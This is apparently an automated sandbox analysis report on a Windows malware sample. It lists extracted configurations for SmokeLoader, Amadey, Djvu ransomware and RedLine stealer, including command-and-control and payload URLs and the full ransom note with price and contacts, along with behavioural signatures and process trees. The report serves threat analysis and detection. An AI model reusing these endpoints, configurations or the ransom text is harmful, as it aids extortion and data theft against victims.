Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2023 13:04
Static task
static1
Behavioral task
behavioral1
Sample
2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe
Resource
win10v2004-20230220-en
General
-
Target
2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe
-
Size
250KB
-
MD5
2288260696cf043ce22bcc826bfd2004
-
SHA1
7fffeb015bf41fd662f5aa4ec1f3cceb3a16b96e
-
SHA256
2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425
-
SHA512
9aca913551aaabe23c45a0dd6623bc5dbc902040eac24572ee9ea2e02ac0e191f820df59f41ea237ab4fa7bae996fcc479e6e7e6bad59e0043e84ee57a4d539c
-
SSDEEP
3072:Q1u/tRkMhpOVNxk9Lqe9ZY9Ug4fVAXuBN0E1QG/EX7CxpqKMj5Wx21uXv:Au1RqVXk9LB9ZqUg4fKel5e75Kzxs
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.jypo
-
offline_id
MEMHlobHgXqvmTWaMsLcwGZhDOd00bblO1yevst1
-
payload_url
http://uaery.top/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-fkW8qLaCVQ Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0676JOsie
Extracted
redline
koreamon
koreamonitoring.com:80
-
auth_value
1a0e1a9f491ef3df873a03577dfa10aa
Signatures
-
Detect rhadamanthys stealer shellcode 1 IoCs
resource yara_rule behavioral1/memory/2200-1305-0x0000000002350000-0x000000000236C000-memory.dmp family_rhadamanthys -
Detected Djvu ransomware 16 IoCs
resource yara_rule behavioral1/memory/368-234-0x0000000002560000-0x000000000267B000-memory.dmp family_djvu behavioral1/memory/1216-235-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1216-233-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1216-225-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1216-240-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1216-254-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-260-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-261-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-262-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-267-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-268-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-274-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-276-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-277-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-289-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4052-308-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 17 IoCs
resource yara_rule behavioral1/memory/548-311-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-313-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-322-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-316-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-324-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-326-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-328-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-330-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-332-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-334-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-336-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-338-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-340-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-342-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-344-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-346-0x0000000005320000-0x0000000005372000-memory.dmp family_redline behavioral1/memory/548-348-0x0000000005320000-0x0000000005372000-memory.dmp family_redline -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 1916 created 3220 1916 XandETC.exe 25 PID 1916 created 3220 1916 XandETC.exe 25 PID 1916 created 3220 1916 XandETC.exe 25 PID 1916 created 3220 1916 XandETC.exe 25 PID 1916 created 3220 1916 XandETC.exe 25 PID 1216 created 3220 1216 updater.exe 25 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 6371.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 6C3C.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 6E02.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 6E02.exe -
Executes dropped EXE 22 IoCs
pid Process 3064 3FD8.exe 3160 4150.exe 5052 573A.exe 3464 58A2.exe 3412 6371.exe 2308 Player3.exe 316 ss31.exe 1916 XandETC.exe 1332 nbveek.exe 3020 6C3C.exe 368 6E02.exe 2496 Player3.exe 1216 6E02.exe 3824 6E02.exe 4052 6E02.exe 4940 build3.exe 548 B175.exe 3528 nbveek.exe 1748 mstsca.exe 1216 updater.exe 2200 20BA.exe 4304 nbveek.exe -
Loads dropped DLL 3 IoCs
pid Process 1596 rundll32.exe 3600 rundll32.exe 1384 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3532 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\74a59828-2db9-43c1-b171-30fdb56510b6\\6E02.exe\" --AutoStart" 6E02.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 75 api.2ip.ua 76 api.2ip.ua 84 api.2ip.ua -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2200 20BA.exe 2200 20BA.exe 2200 20BA.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 368 set thread context of 1216 368 6E02.exe 114 PID 3824 set thread context of 4052 3824 6E02.exe 124 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4516 sc.exe 1868 sc.exe 1620 sc.exe 3676 sc.exe 3228 sc.exe 3292 sc.exe 1824 sc.exe 1140 sc.exe 1916 sc.exe 536 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 4372 3160 WerFault.exe 93 1228 3464 WerFault.exe 97 4036 3020 WerFault.exe 108 1588 548 WerFault.exe 128 1356 1384 WerFault.exe 173 5052 2200 WerFault.exe 170 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FD8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 573A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 573A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FD8.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3FD8.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 573A.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3788 schtasks.exe 5084 schtasks.exe 1228 schtasks.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1112 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe 1112 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3220 Explorer.EXE -
Suspicious behavior: MapViewOfSection 21 IoCs
pid Process 1112 2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe 3064 3FD8.exe 5052 573A.exe 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE 3220 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeShutdownPrivilege 3220 Explorer.EXE Token: SeCreatePagefilePrivilege 3220 Explorer.EXE Token: SeDebugPrivilege 548 B175.exe Token: SeDebugPrivilege 4792 powershell.exe Token: SeShutdownPrivilege 1560 powercfg.exe Token: SeCreatePagefilePrivilege 1560 powercfg.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeShutdownPrivilege 2552 powercfg.exe Token: SeCreatePagefilePrivilege 2552 powercfg.exe Token: SeShutdownPrivilege 4880 powercfg.exe Token: SeCreatePagefilePrivilege 4880 powercfg.exe Token: SeShutdownPrivilege 5084 powercfg.exe Token: SeCreatePagefilePrivilege 5084 powercfg.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe Token: SeRemoteShutdownPrivilege 3872 powershell.exe Token: SeUndockPrivilege 3872 powershell.exe Token: SeManageVolumePrivilege 3872 powershell.exe Token: 33 3872 powershell.exe Token: 34 3872 powershell.exe Token: 35 3872 powershell.exe Token: 36 3872 powershell.exe Token: SeIncreaseQuotaPrivilege 3872 powershell.exe Token: SeSecurityPrivilege 3872 powershell.exe Token: SeTakeOwnershipPrivilege 3872 powershell.exe Token: SeLoadDriverPrivilege 3872 powershell.exe Token: SeSystemProfilePrivilege 3872 powershell.exe Token: SeSystemtimePrivilege 3872 powershell.exe Token: SeProfSingleProcessPrivilege 3872 powershell.exe Token: SeIncBasePriorityPrivilege 3872 powershell.exe Token: SeCreatePagefilePrivilege 3872 powershell.exe Token: SeBackupPrivilege 3872 powershell.exe Token: SeRestorePrivilege 3872 powershell.exe Token: SeShutdownPrivilege 3872 powershell.exe Token: SeDebugPrivilege 3872 powershell.exe Token: SeSystemEnvironmentPrivilege 3872 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3220 wrote to memory of 3064 3220 Explorer.EXE 92 PID 3220 wrote to memory of 3064 3220 Explorer.EXE 92 PID 3220 wrote to memory of 3064 3220 Explorer.EXE 92 PID 3220 wrote to memory of 3160 3220 Explorer.EXE 93 PID 3220 wrote to memory of 3160 3220 Explorer.EXE 93 PID 3220 wrote to memory of 3160 3220 Explorer.EXE 93 PID 3220 wrote to memory of 5052 3220 Explorer.EXE 96 PID 3220 wrote to memory of 5052 3220 Explorer.EXE 96 PID 3220 wrote to memory of 5052 3220 Explorer.EXE 96 PID 3220 wrote to memory of 3464 3220 Explorer.EXE 97 PID 3220 wrote to memory of 3464 3220 Explorer.EXE 97 PID 3220 wrote to memory of 3464 3220 Explorer.EXE 97 PID 3220 wrote to memory of 3412 3220 Explorer.EXE 100 PID 3220 wrote to memory of 3412 3220 Explorer.EXE 100 PID 3220 wrote to memory of 3412 3220 Explorer.EXE 100 PID 3412 wrote to memory of 2308 3412 6371.exe 101 PID 3412 wrote to memory of 2308 3412 6371.exe 101 PID 3412 wrote to memory of 2308 3412 6371.exe 101 PID 3412 wrote to memory of 316 3412 6371.exe 102 PID 3412 wrote to memory of 316 3412 6371.exe 102 PID 3412 wrote to memory of 1916 3412 6371.exe 104 PID 3412 wrote to memory of 1916 3412 6371.exe 104 PID 2308 wrote to memory of 1332 2308 Player3.exe 103 PID 2308 wrote to memory of 1332 2308 Player3.exe 103 PID 2308 wrote to memory of 1332 2308 Player3.exe 103 PID 1332 wrote to memory of 5084 1332 nbveek.exe 105 PID 1332 wrote to memory of 5084 1332 nbveek.exe 105 PID 1332 wrote to memory of 5084 1332 nbveek.exe 105 PID 1332 wrote to memory of 3720 1332 nbveek.exe 107 PID 1332 wrote to memory of 3720 1332 nbveek.exe 107 PID 1332 wrote to memory of 3720 1332 nbveek.exe 107 PID 3220 wrote to memory of 3020 3220 Explorer.EXE 108 PID 3220 wrote to memory of 3020 3220 Explorer.EXE 108 PID 3220 wrote to memory of 3020 3220 Explorer.EXE 108 PID 3720 wrote to memory of 216 3720 cmd.exe 111 PID 3720 wrote to memory of 216 3720 cmd.exe 111 PID 3720 wrote to memory of 216 3720 cmd.exe 111 PID 3720 wrote to memory of 2320 3720 cmd.exe 110 PID 3720 wrote to memory of 2320 3720 cmd.exe 110 PID 3720 wrote to memory of 2320 3720 cmd.exe 110 PID 3220 wrote to memory of 368 3220 Explorer.EXE 113 PID 3220 wrote to memory of 368 3220 Explorer.EXE 113 PID 3220 wrote to memory of 368 3220 Explorer.EXE 113 PID 3720 wrote to memory of 3840 3720 cmd.exe 112 PID 3720 wrote to memory of 3840 3720 cmd.exe 112 PID 3720 wrote to memory of 3840 3720 cmd.exe 112 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 368 wrote to memory of 1216 368 6E02.exe 114 PID 3720 wrote to memory of 3760 3720 cmd.exe 120 PID 3720 wrote to memory of 3760 3720 cmd.exe 120 PID 3720 wrote to memory of 3760 3720 cmd.exe 120 PID 3720 wrote to memory of 3276 3720 cmd.exe 115 PID 3720 wrote to memory of 3276 3720 cmd.exe 115 PID 3720 wrote to memory of 3276 3720 cmd.exe 115 PID 3020 wrote to memory of 2496 3020 6C3C.exe 116 PID 3020 wrote to memory of 2496 3020 6C3C.exe 116 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe"C:\Users\Admin\AppData\Local\Temp\2fb7557aa1e9d3d46a81e6734054cd4cca13e14e950cebbb3c0bcf8cbddb5425.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\3FD8.exeC:\Users\Admin\AppData\Local\Temp\3FD8.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3064
-
-
